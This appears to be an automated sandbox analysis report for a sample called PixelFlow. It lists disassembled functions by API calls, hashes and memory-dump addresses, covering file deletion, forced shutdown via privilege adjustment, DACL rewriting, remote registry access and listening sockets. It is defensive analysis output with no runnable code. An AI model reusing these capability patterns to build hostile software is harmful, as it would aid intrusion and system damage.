Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 397afc459fb3620d08a9f7d876feebd1483d96e3bd31b0a2e1e372904e7eef75
Instruction ID: 365fa795917b2dca8c19aab1697cdfb0c662f7e82ebde81f48d20a564130706e
Opcode Fuzzy Hash: 397afc459fb3620d08a9f7d876feebd1483d96e3bd31b0a2e1e372904e7eef75
Instruction Fuzzy Hash: 8F31D43250022E6FDF209FA4FC48ADE77AE9F46324F100566F914E32A0DB318E858B64

Function 0066E0CA Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0066E18C
SystemTimeToFileTime.KERNEL32(?,?), ref: 0066E19C
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0066E1A8
__wsplitpath.LIBCMT ref: 0066E206
_wcscat.LIBCMT ref: 0066E21E
_wcscat.LIBCMT ref: 0066E230
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0066E245
SetCurrentDirectoryW.KERNEL32(?), ref: 0066E259
SetCurrentDirectoryW.KERNEL32(?), ref: 0066E28B
SetCurrentDirectoryW.KERNEL32(?), ref: 0066E2AC
_wcscpy.LIBCMT ref: 0066E2B8
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0066E2F7

Strings

*.*, xrefs: 0066E2B2

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: ffde012714f0463ffd0eacc4c9cfb8f1227994c8242110086e8179d79d49ccd4
Instruction ID: 47a9d6503d2d758446e5b95c79d1afec4c300c65bea82c5b065c9ed636740a15
Opcode Fuzzy Hash: ffde012714f0463ffd0eacc4c9cfb8f1227994c8242110086e8179d79d49ccd4
Instruction Fuzzy Hash: 6B6158B65046059FD710EF60C88599FB3EAFF89310F04891EF98A87251DB32EA45CF96

Function 006586B0 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00658C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00658C1F
Part of subcall function 00658C03: GetLastError.KERNEL32(?,006586E3,?,?,?), ref: 00658C29
Part of subcall function 00658C03: GetProcessHeap.KERNEL32(00000008,?,?,006586E3,?,?,?), ref: 00658C38
Part of subcall function 00658C03: HeapAlloc.KERNEL32(00000000,?,006586E3,?,?,?), ref: 00658C3F
Part of subcall function 00658C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00658C56

Part of subcall function 00658CA0: GetProcessHeap.KERNEL32(00000008,006586F9,00000000,00000000,?,006586F9,?), ref: 00658CAC
Part of subcall function 00658CA0: HeapAlloc.KERNEL32(00000000,?,006586F9,?), ref: 00658CB3
Part of subcall function 00658CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006586F9,?), ref: 00658CC4

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00658714
_memset.LIBCMT ref: 00658729
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00658748
GetLengthSid.ADVAPI32(?), ref: 00658759
GetAce.ADVAPI32(?,00000000,?), ref: 00658796
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006587B2
GetLengthSid.ADVAPI32(?), ref: 006587CF
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006587DE
HeapAlloc.KERNEL32(00000000), ref: 006587E5
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00658806
CopySid.ADVAPI32(00000000), ref: 0065880D
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0065883E
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00658864
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00658878

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: cd0982e307b3622793640cd035d60f282056dade092f911951e7e7797b9c1132
Instruction ID: c66bd1d375fd798e35d3ae7e26a305edfd5339df4297755ea47029606e0e487c
Opcode Fuzzy Hash: cd0982e307b3622793640cd035d60f282056dade092f911951e7e7797b9c1132
Instruction Fuzzy Hash: 3B61587190020AAFDF04DFA5DC44EEEBB7AFF04305F04862AE815A7690DB359A18CF64

Function 00680802 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00681242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006801D5,?,?), ref: 00681259

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006808D4

Part of subcall function 00604D37: __itow.LIBCMT ref: 00604D62
Part of subcall function 00604D37: __swprintf.LIBCMT ref: 00604DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00680973
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00680A0B
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00680C4A
RegCloseKey.ADVAPI32(00000000), ref: 00680C57

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: b0be7f13ff1b9d78032d58edd680c8553f630cfe609835e6fe26f9d48cb910b7
Instruction ID: cc6072b51c93f103082b4f2e7bb94060b5a6a580a47ce4d98110323a695dbaee
Opcode Fuzzy Hash: b0be7f13ff1b9d78032d58edd680c8553f630cfe609835e6fe26f9d48cb910b7
Instruction Fuzzy Hash: 81E17271204210AFD754DF24C891E6BBBEAFF89314F048A5DF44AD72A1DA31ED05CB51

Function 006642AA Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 006642BE
__swprintf.LIBCMT ref: 006642CB

Part of subcall function 006237FA: __woutput_l.LIBCMT ref: 00623853

FindResourceW.KERNEL32(?,?,0000000E), ref: 006642F5
LoadResource.KERNEL32(?,00000000), ref: 00664301
LockResource.KERNEL32(00000000), ref: 0066430E
FindResourceW.KERNEL32(?,?,00000003), ref: 0066432E
LoadResource.KERNEL32(?,00000000), ref: 00664340
SizeofResource.KERNEL32(?,00000000), ref: 0066434F
LockResource.KERNEL32(?), ref: 0066435B
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006643BC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: bb8f12770816db06fd5493288a596200c19bf12d5b0466d65bbbadbc38a0baa0
Instruction ID: af002331edf58fd73e04917ae42ea2a9c08ccd1d6df5d13eb79b88ee161434d1
Opcode Fuzzy Hash: bb8f12770816db06fd5493288a596200c19bf12d5b0466d65bbbadbc38a0baa0
Instruction Fuzzy Hash: 92318C7160021AAFDF119F61AD88ABF7BAEEF08305F004416F906E6250DB34DA51CBA4

Function 00674614 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0067463B
EmptyClipboard.USER32 ref: 00674641
GlobalAlloc.KERNEL32(00000002,?), ref: 00674656
CloseClipboard.USER32 ref: 006746F5

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: ba6432cf5635f12a1197ef32c0f0475eaa0df2ecafcdf9ee74aff85a05e4f87a
Instruction ID: 2e6b9b5bcece576fe18404c789a67884fdc4a836afcbdd3e8949b1b8663b389c
Opcode Fuzzy Hash: ba6432cf5635f12a1197ef32c0f0475eaa0df2ecafcdf9ee74aff85a05e4f87a
Instruction Fuzzy Hash: DF21B2712412119FEB11AF24EC0DB6E77AAEF45721F01801AF90A9B2A1CF70AD01CB98

Function 00663B4F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006201AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00612A58,?,00008000), ref: 006201CF

Part of subcall function 00664E59: GetFileAttributesW.KERNELBASE(?,00663A6B), ref: 00664E5A

FindFirstFileW.KERNEL32(?,?), ref: 00663C03
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00663CAB
MoveFileW.KERNEL32(?,?), ref: 00663CBE
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00663CDB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00663CFD
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00663D19

Strings

\*.*, xrefs: 00663BAE, 00663BB7, 00663BCC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 6e0d20af6e3d5a445870daeaf2d8269f06bdb90a35e64e2d8ed9591322d138a1
Instruction ID: ab72694c1c8ca86aed3755155b2eaf263f5f91b3b2c946ffa2b2ccebc597ecf1
Opcode Fuzzy Hash: 6e0d20af6e3d5a445870daeaf2d8269f06bdb90a35e64e2d8ed9591322d138a1
Instruction Fuzzy Hash: 6D51923180111DAECF55EBE0CA929EDB77BAF12300F244169E502B7292EF316F49CB64

Function 006655E5 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0065917C: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006591C6
Part of subcall function 0065917C: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006591F3
Part of subcall function 0065917C: GetLastError.KERNEL32 ref: 00659200

ExitWindowsEx.USER32(?,00000000), ref: 00665621

Strings

SeShutdownPrivilege, xrefs: 006655F1
, xrefs: 0066560F
@, xrefs: 00665614

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 40e83da165467f5e8cf782d5519edc206cac5d90b5f3c1f4b979fb01cc8e3cd5
Instruction ID: 90f79cd84c4beeb7a1abd262cd226f3afc9b08969cd8c57623245e7b342bb5e3
Opcode Fuzzy Hash: 40e83da165467f5e8cf782d5519edc206cac5d90b5f3c1f4b979fb01cc8e3cd5
Instruction Fuzzy Hash: E30126716906126FF7686A68DC4BFFA725FEB04741F900525FD17E22F3DA905C00C9A9

Function 00676733 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 0067678C
WSAGetLastError.WSOCK32(00000000), ref: 0067679B
bind.WSOCK32(00000000,?,00000010), ref: 006767B7
listen.WSOCK32(00000000,00000005), ref: 006767C6
WSAGetLastError.WSOCK32(00000000), ref: 006767E0
closesocket.WSOCK32(00000000,00000000), ref: 006767F4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: e307d81d976b96a59e987249642f09a45fe89c1838e4912459991936ab580c6b
Instruction ID: 9120bb59f006edfa02edf80f2a549587b1e46702e7a286b5063d0d8468d87885
Opcode Fuzzy Hash: e307d81d976b96a59e987249642f09a45fe89c1838e4912459991936ab580c6b
Instruction Fuzzy Hash: F621CE706006009FDB14EF64D989AAEB3AAEF44325F10855DF92AA73D1CB30AC018BA1

Function 00601663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 006029E2: GetWindowLongW.USER32(?,000000EB), ref: 006029F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00601DD6
GetSysColor.USER32(0000000F), ref: 00601E2A
SetBkColor.GDI32(?,00000000), ref: 00601E3D

Part of subcall function 0060166C: DefDlgProcW.USER32(?,00000020,?), ref: 006016B4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 04661ed7da8bc8a037581942f8d6f647d290bee7e713ffdbdcbabdabc5883cd9
Instruction ID: 214efea5244d539f2c18533a75cb617352a286d12c2fdae67429f7d8d75bdf0f
Opcode Fuzzy Hash: 04661ed7da8bc8a037581942f8d6f647d290bee7e713ffdbdcbabdabc5883cd9
Instruction Fuzzy Hash: B9A10370195404BAEB2C7B698C59EBB759FDF43315F14120EF502DE2D2DE249E02C2BA

Function 0066C16C Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0066C196
_wcscmp.LIBCMT ref: 0066C1C6
_wcscmp.LIBCMT ref: 0066C1DB
FindNextFileW.KERNEL32(00000000,?), ref: 0066C1EC
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0066C21C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 3a227427e0b764a49ad9ef7272fdfe9fec0388c618465c8c4fe8dc7c7064f97d
Instruction ID: fc218163ca7a59e87da20b0ab87b8191e6ed30285a87906e07f43340746e4c01
Opcode Fuzzy Hash: 3a227427e0b764a49ad9ef7272fdfe9fec0388c618465c8c4fe8dc7c7064f97d
Instruction Fuzzy Hash: A9518F75604A029FD714DFA8D4A0EAAB3EAFF49320F10461DF99687391DB30EE05CB95

Function 00676BF7 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0067823D: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00678268

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00676C4E
WSAGetLastError.WSOCK32(00000000), ref: 00676C77
bind.WSOCK32(00000000,?,00000010), ref: 00676CB0
WSAGetLastError.WSOCK32(00000000), ref: 00676CBD
closesocket.WSOCK32(00000000,00000000), ref: 00676CD1

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: e65822c8f51ac841db6f9ac451023684d96781390e6f4c70e2074bff7a8a0766
Instruction ID: 09e13128e8b78726f06866a3ce1597e46882e6aec524d218e97b82191ec7d016
Opcode Fuzzy Hash: e65822c8f51ac841db6f9ac451023684d96781390e6f4c70e2074bff7a8a0766
Instruction Fuzzy Hash: FA41E5B1780600AFEB64AF64DC86F6E77AADF04710F04845CFA19AB3C2CA709D008B95

Function 0068577B Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 006857CA
IsWindowEnabled.USER32 ref: 006857D8
GetForegroundWindow.USER32(?,?,00000001), ref: 006857E5
IsIconic.USER32 ref: 006857F3
IsZoomed.USER32 ref: 00685801

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: aa6f529dbf698b905be739589f4b824d7ff594f680016aadc1719e982a0bcf2b
Instruction ID: a84945579df26dd17b653f84ff67bbb90a2b43e7c2046521afac5ce64e029af8
Opcode Fuzzy Hash: aa6f529dbf698b905be739589f4b824d7ff594f680016aadc1719e982a0bcf2b
Instruction Fuzzy Hash: 3911C4717409219FEB216F26DC44A6FBB9FFF44761B41852AF806D7281CB30EC018BA4

Function 0067279E Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00672891
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 006728C8

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 5b7fa71698f52c8d06fca0fe6b5a90a55c34a13ead2088c40a04581231311a41
Instruction ID: 1e068f26027bf8be5885df5c4380a7575fd2694b2fa232920d25d79d00cd261d
Opcode Fuzzy Hash: 5b7fa71698f52c8d06fca0fe6b5a90a55c34a13ead2088c40a04581231311a41
Instruction Fuzzy Hash: 98412B7190430ABFEB20DE95DC91EFF73BEEB40324F10802EF609A6241EA719E459A55

Function 0065917C Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00620F16: std::exception::exception.LIBCMT ref: 00620F4C
Part of subcall function 00620F16: __CxxThrowException@8.LIBCMT ref: 00620F61

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006591C6
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006591F3
GetLastError.KERNEL32 ref: 00659200

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 1419a0874af2d89f81712bfdd8970935fd0b6ca50fd0e40ce462b414ad72a9cd
Instruction ID: 43e5e852f27846335aadef14bfe9c1dd64733e335a554bfe81a1e876937acc75
Opcode Fuzzy Hash: 1419a0874af2d89f81712bfdd8970935fd0b6ca50fd0e40ce462b414ad72a9cd
Instruction Fuzzy Hash: 3011C1B1414606AFE728DF64EC89D6BBBBEEB44711B20812EF84593701EB30AC00CB64

Function 006640C1 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006640DE
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0066411F
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0066412A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 716f9c5fd2d378bf6e409354785994cdfe94bc128fa9f459cf58a3c7f9c8c3cf
Instruction ID: 0a6350233699552f29d567f0cd3585d21984fe05b3e674cb7dfba2a18d7e18fb
Opcode Fuzzy Hash: 716f9c5fd2d378bf6e409354785994cdfe94bc128fa9f459cf58a3c7f9c8c3cf
